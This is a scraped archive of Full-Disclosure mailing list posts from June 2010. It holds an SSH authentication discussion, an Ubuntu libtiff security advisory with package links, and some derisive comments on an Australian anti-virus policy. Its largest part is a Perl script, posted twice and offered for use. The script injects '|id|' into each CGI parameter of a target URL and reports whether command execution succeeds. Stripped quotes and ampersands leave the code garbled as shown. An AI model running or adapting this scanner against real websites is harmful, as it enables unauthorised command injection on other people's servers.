On 6/17/2010 3:21 PM, Paul Schmehl wrote: --On Thursday, June 17, 2010 11:04:52 -0700 Xin LI delp...@gmail.com wrote: Of course it's wise to disable password authentication and just use public key authentication. Why? Ssh is encrypted, so you're not exposing a password when you login. How does public key authentication make you more secure (in a practical sense)? In the case of SSH password auth you are handing the plaintext password directly to any server you log in to. For many of us, this is basically any time we're expecting to contact that server for the first time from that client machine. For users who are willing to bypass a server key mismatch warning, they may be giving away their password every time. I know there's somebody out there who always verifies server fingerprints through an independent trusted channel before accepting them. I would like to meet this person. Often the same password is used on multiple systems (e.g. kerberos/active directory). However, if the client is configured to only use public key auth, accidentally connecting to a malicious server does not automatically give the bad guy your plaintext password. - Marsh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-954-1] tiff vulnerabilities
=== Ubuntu Security Notice USN-954-1 June 21, 2010 tiff vulnerabilities CVE-2010-1411, CVE-2010-2065, CVE-2010-2067 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libtiff43.7.4-1ubuntu3.8 Ubuntu 8.04 LTS: libtiff43.8.2-7ubuntu3.6 Ubuntu 9.04: libtiff43.8.2-11ubuntu0.9.04.6 Ubuntu 9.10: libtiff43.8.2-13ubuntu0.3 Ubuntu 10.04 LTS: libtiff43.9.2-2ubuntu0.3 After a standard system update you need to restart your session to make all the necessary changes. Details follow: Kevin Finisterre discovered that the TIFF library did not correctly handle certain image structures. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could execute arbitrary code with user privileges, or crash the application, leading to a denial of service. (CVE-2010-1411) Dan Rosenberg and Sauli Pahlman discovered multiple flaws in the TIFF library. If a user or automated system were into opening a specially crafted TIFF image, a remote attacker could execute arbitrary code with user privileges, or crash the application, leading to a denial of service. (Only Ubuntu 10.04 LTS was affected.) (CVE-2010-2065, CVE-2010-2067) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.8.diff.gz Size/MD5:23040 b840c801a3d7fc4d0a1053d6fabbe707 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.8.dsc Size/MD5: 803 d68889478f2962e9b31033bebc892e89 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz Size/MD5: 1280113 02cf5c3820bda83b35bb35b45ae27005 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.8_amd64.deb Size/MD5: 221050 4d3f5ef363350aa5ade8af964f8cb3ab http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.8_amd64.deb Size/MD5: 282864 3ab150b16046d29337ba739f09ffee98 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.8_amd64.deb Size/MD5: 476068 717cb178af7ec2759268c50fd9257300 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.8_amd64.deb Size/MD5:44808 e94b7ae7d8c4ed4125db7276f84df640 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.8_amd64.deb Size/MD5:49990 ad2f88b3d31e6ce02cc727f834f67fa6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.8_i386.deb Size/MD5: 206022 713177b3875929efae2c3ff8089067a4 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.8_i386.deb Size/MD5: 259564 da2b2a54a49072deb1099928d4d21e4f http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.8_i386.deb Size/MD5: 462376 7672d9dab7dfb1c1f80465aedb91c68e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.8_i386.deb Size/MD5:44808 6b927f6f57aa78861af48514ddac5918 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.8_i386.deb Size/MD5:49330 5206a97516a0b6f76e423c2f90b8cfee powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.8_powerpc.deb Size/MD5: 239948 68f3cdaac63717128344589f976ae975 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.8_powerpc.deb Size/MD5: 288748 96e81fafcef3b4245c80ced08cc5752a http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.8_powerpc.deb Size/MD5: 476678 9ee3902c1570f7b9cb458e6ed844abb1 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.8_powerpc.deb Size/MD5:47040 399804bdbcfbd3d38b976957ffec738b http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.8_powerpc.deb Size/MD5:51672 ba92c41d9105bb80729ff263f7955e63 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.8_sparc.deb Size/MD5: 208940 c67ceaa5d1c09987d580c438874c17f6 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.8_sparc.deb Size/MD5: 270628
Re: [Full-disclosure] (Almost) Universal perl CGI exploitation
This has a small bug. Gives false positives on some websites, silly me. Here's an updated version: --- code --- #!/usr/bin/perl #oxagast if (@ARGV[0] eq ) { print ---=== oxagast's buggy cgi finder ===---\n\n; print Please provide a URL with a CGI script and it's args.\n; print ex. $0 \http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txtclick_num=0hello=world\ http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txtclick_num=0hello=world%5C\n; exit; } @urlquestionsplit = split(/\?/, @ARGV[0]); $baseurl = @urlquestionsplit[0]; @inputafterquestion = split(/\/, @urlquestionsplit[1]); for $countargs (0..scalar(@inputafterquestion)) { $numofargs = $countargs; } for $cgiargsplitter (0..$numofargs) { @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]); push @cgiargsaftereq, @cgiaanda[1]; } for $thisarg (0..$numofargs-1) { $wholestring = @urlquestionsplit[1]; $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/; push @urltotest, $baseurl?$wholestring; } for $argnumber (0..$numofargs) { system(echo \wget -q -O gettmp \'@urltotest[$argnumber]\'\ getfile.sh); system(chmod u+x getfile.sh); system(./getfile.sh); @gotstuff = `cat gettmp`; $done = 0; $exploitable; for $line (0..scalar(@gotstuff)-1) { if (@gotstuff[$line] =~ m/uid\=/) { if ($done == 0) { $done = 1; $firstline = $line; @gotstuff[$line] =~ m/.*uid(.*)\).*/; $uidline = uid$1); print Exploitable...\n; print @urltotest[$argnumber]\n; print $uidline\n; unlink(gettemp); unlink(getfile.sh); $exploitable = 1; } } } system(rm gettmp getfile.sh); } if ($exploitable == 0) { print Sorry, not exploitable...\n; } --- code --- On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker marshallwhitta...@gmail.com wrote: This works on the perl pipe bug. It'll take an arg that's the address of a website and it's cgi script with some args to the script then figure out if it can exploit it and how. It's worked on everything I've tried it on, though I have limited test boxes. It's pretty dirty but it works. #!/usr/bin/perl #oxagast if (@ARGV[0] eq ) { print ---=== oxagast's buggy cgi finder ===---\n\n; print Please provide a URL with a CGI script and it's args.\n; print ex. $0 \http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txtclick_num=0hello=world\ http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txtclick_num=0hello=world%5C\n; exit; } @urlquestionsplit = split(/\?/, @ARGV[0]); $baseurl = @urlquestionsplit[0]; @inputafterquestion = split(/\/, @urlquestionsplit[1]); for $countargs (0..scalar(@inputafterquestion)) { $numofargs = $countargs; } for $cgiargsplitter (0..$numofargs) { @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]); push @cgiargsaftereq, @cgiaanda[1]; } for $thisarg (0..$numofargs-1) { $wholestring = @urlquestionsplit[1]; $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/; push @urltotest, $baseurl?$wholestring; } for $argnumber (0..$numofargs) { system(echo \wget -q -O gettmp \'@urltotest[$argnumber]\'\ getfile.sh); system(chmod u+x getfile.sh); system(./getfile.sh); @gotstuff = `cat gettmp`; $done = 0; $exploitable; for $line (0..scalar(@gotstuff)-1) { if (@gotstuff[$line] =~ m/uid/) { if ($done == 0) { $done = 1; $firstline = $line; @gotstuff[$line] =~ m/.*uid(.*)\).*/; $uidline = uid$1); print Exploitable...\n; print @urltotest[$argnumber]\n; print $uidline\n; unlink(gettemp); unlink(getfile.sh); $exploitable = 1; } } } system(rm gettmp getfile.sh); } if ($exploitable == 0) { print Sorry, not exploitable...\n; } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] No anti-virus software? No internet connection
Security is as easy as that.. http://www.news.com.au/technology/no-anti-virus-software-no-internet-connection/story-e6frfro0-1225882656490 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] No anti-virus software? No internet connection
yep, your tax $$$ at work Don't forget there Internet filter as well.. With these rocket scientist running the show, what's there to worry about http://blogs.news.com.au/techblog/index.php/news/comments/finally_theres_protection_against_spams_and_scams On Tue, Jun 22, 2010 at 2:32 PM, Jubei Trippataka vpn.1.fana...@gmail.com wrote: They had a committee working on this for a year and that's the best they could come up with? HAHAHAHA. Belinda Neal - With idiots like you and your colleagues tackling this issue, tax payers deserve to burn you at the stake. BTW... are you really a du0d? -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] No anti-virus software? No internet connection
They had a committee working on this for a year and that's the best they could come up with? HAHAHAHA. Belinda Neal - With idiots like you and your colleagues tackling this issue, tax payers deserve to burn you at the stake. BTW... are you really a du0d? -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/